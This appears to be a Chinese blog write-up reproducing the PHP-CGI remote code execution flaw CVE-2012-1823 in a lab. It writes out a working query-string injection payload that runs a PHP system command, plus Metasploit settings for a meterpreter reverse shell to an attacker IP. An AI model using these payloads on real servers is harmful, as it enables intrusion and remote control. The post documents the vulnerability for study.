CVE-2012-1823复现

hhiollk

已于 2022-09-03 23:14:04 修改

阅读量1.1k

点赞数

分类专栏：执行代码文章标签： php 安全经验分享

于 2020-03-31 13:42:19 首次发布

本文链接：https://blog.youkuaiyun.com/jiyongx/article/details/105220880

版权

执行代码专栏收录该内容

4 篇文章

订阅专栏

PHP-CGI远程代码执行漏洞

这个古老的漏洞，其实就是用户请求的querystring被作为了php-cgi的参数，命令行参数不仅可以通过

#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi，还可以通过querystring的方式传入。

影响版本

< php-5.3.12php < 5.4.2mod方式、fpm方式不受影响

CGI模式下可控命令行参数

c 指定php.ini文件（PHP的配置文件）的位置n 不要加载php.ini文件d 指定配置项b 启动fastcgi进程s 显示文件源码T 执行指定次该文件h和? 显示帮助

漏洞利用

该站点在8080端口，访问即可

在后面加上-s,若返回源码，则说明存在此漏洞

http://ip:8080/index.php/?-s

执行代码

这里可以通过使用-d来指定auto_prepend_file制造任意文件包含漏洞，使用burpsuite抓包，然后修改数据包内容。使用“+”代替空格%3d代替“=”

-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
<?php echo system("ls"); ?>

反弹shell

这里我用了Metasploit

search php_cgiuse exploit/multi/http/php_cgi_arg_injectionset rhosts 目标ipset rport 8080set payload php/meterpreter/reverse_tcpset lhost 攻击ip

配置如下

配置好了之后执行命令开始攻击

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hhiollk

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CVE-2012-1823漏洞复现

qq_46804551的博客

05-27

636

前言这个漏洞简单来说，就是用户请求的querystring（querystring字面上的意思就是查询字符串，一般是对http请求所带的数据进行解析，这里也是指http请求中所带的数据）被作为了php-cgi的参数，最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface)，它是一段程序, 通俗的讲CGI就象是一座桥，把网页和WEB服务器中的执行程序连接起来，它把HTML接收的指令传递给服务器的执行程序，再把服务器执行程序的结果返还给HTML页。复现在相应的漏洞环

cve-2012-1823漏洞复现

m0_74402888的博客

04-28

830

CVE-2012-1823就是存在于以cgi模式运行的php中，本质是用户请求的参数被作为了php-cgi的参数。cgi：它是一种协议。通过cgi协议，web server可以将动态请求和相关参数发送给专门处理动态内容的应用程序。

参与评论您还未登录，请先登录后发表或查看评论

CVE-2012-1823

最新发布

Dikesi的博客

02-09

1022

PHP-CGI远程代码执行漏洞

phpcgi 代码执行 (CVE-2012-1823) 复现

m0_49936858的博客

08-22

631

CGI全称是“通用网关接口”(Common Gateway Interface)，它可以让一个客户端，从网页浏览器向执行在Web服务器上的程序请求数据这个漏洞简单来说，就是用户请求的querystring（querystring字面上的意思就是查询字符串，一般是对http请求所带的数据进行解析，这里也是只http请求中所带的数据）被作为了php-cgi的参数，最终导致了一系列结果。可见，获取querystring后进行解码，如果第一个字符是-则设置skip_getopt，也就是不要获取命令行参数。

漏洞复现之CVE-2012-1823（PHP-CGI远程代码执行）

ASD830的博客

06-18

753

发现flag，查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}可以发现其php版本为5.4.1，而且可以看到一个cve字样：cve20121823。得到index.php和info.php，使用cat命令查看一下index.php。提示我们这里没什么东西，我们猜测flag可能在根目录下，目录穿越一下。接着我们使用-d 指定配置项，这里我们可以结合post请求执行命令。发现info.php，直接访问/info.php。首先我们使用-s命令查看一下源代码。

PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现

ADummy的博客

02-25

1033

PHP-CGI远程代码执行漏洞（CVE-2012-1823） by ADummy 0x00利用路线 Burpsuite抓包改包—>代码执行 0x01漏洞介绍首先，介绍一下PHP的运行模式。下载PHP源码，可以看到其中有个目录叫sapi。sapi在PHP中的作用，类似于一个消息的“传递者”，比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm，他的作用就是接受Web容器通过fastcgi协议封装好的

CVE-2024-38819：Spring 框架路径遍历 PoC 漏洞复现

12-16

CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架，它提供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题，这是一种安全漏洞，攻击者可以利用它来...

CVE-2024-53677

12-17

CVE-2024-53677 – 关键的 Apache Struts 远程代码执行漏洞已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677，该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的，...

exploit （Linux 内核CVE-2024-1086漏洞复现脚本）

06-06

Linux 内核CVE-2024-1086漏洞复现脚本。在普通用户下，将文件上传后，chmod 777 exploit ，然后运行 ./exploit ，提权成功，输入id，可看到已经是root权限。

OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令

03-31

本篇将详细讨论如何修补OpenSSH中的几个已知漏洞，包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。首先，让我们了解这些特定的漏洞： 1. CVE-2020-15778：这是一个与OpenSSH密钥协商过程相关的漏洞，可能...

oracle 11.2.0.1 CVE-2012-1675 补丁：p12880299_112010_Linux-x86-64.zip

01-19

CVE-2012-1675 补丁 oracle 11.2.0.1

PHP-CGI远程代码执行漏洞CVE-2012-1823复现

从不专注的人的博客

06-17

1323

目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因用户请求的querystring被作为了php-cgi的参数执行了，命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi，还可以通过querystring的方式传入。影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方

PHP-CGI远程代码执行漏洞CVE-2012-1823漏洞复现

qq_29365787的博客

12-10

1383

一、漏洞介绍这个漏洞简单来说，就是用户请求的querystring（querystring字面上的意思就是查询字符串，一般是对http请求所带的数据进行解析，这里也是只http请求中所带的数据）被作为了php-cgi的参数，最终导致了一系列结果。影响范围：漏洞影响版本 php < 5.3.12 or php < 5.4.2 PS:CVE-2012-1823是在php-cgi运行模式下出现的漏洞，其漏洞只出现在以cgi模式运行的php中二、PHP运行的四种模式： 1）cgi 通用网关接口（

CVE-2012-1823 漏洞复现

Jay17的博客

02-10

1801

CVE-2012-1823 漏洞复现

（CVE-2012-1823）PHP-CGI远程代码执行漏洞（80端口）

m0_62670778的博客

05-12

863

php-cgi是一个类似于消息的“传递者”，它接收web容器收到的http数据包，并把里面的数据交给PHP解释器执行php-cgi有两个功能，一是提供cgi方式的交互，二是提供fastcgi方式的交互cgi方式：web容器接收到http数据包后，拿到用户请求的文件（cgi脚本），并fork除一个子进程（解释器）去执行这个文件，然后拿到执行结果，直接返回给用户，然后子进程结束，但是这个cgi模式不能接收同时接收大量的请求，因为创建进程的时候会消耗服务器资源，资源也不是无限的，所以有了fastcgi。

CVE-2012-1823学习

公众号shadow sock7

03-27

1364

参考： https://pentesterlab.com/exercises/cve-2012-1823/courseuser@debian:~$ php-cgi -h Usage: php [-q] [-h] [-s] [-v] [-i] [-f ] php [args...] -a Run interactively -b | Bind Pa

PHP-CGI远程代码执行漏洞（CVE-2012-1823）

weixin_74149904的博客

10-21

1691

CVE-2012-1823就是存在于以cgi模式运行的php中，本质是用户请求的参数被作为了php-cgi的参数。PHP-CGI远程代码执行漏洞（CVE-2012-1823）分析。

CVE-2023-32315 Openfire 漏洞绕过技术复现

该文件"CVE-2023-32315-Openfire-Bypass-main.zip"很可能包含了用于复现CVE-2023-32315漏洞的代码或工具。复现漏洞是指在安全测试过程中，通过特定的步骤或代码执行，重现该漏洞的整个过程。这是一个重要的步骤，它...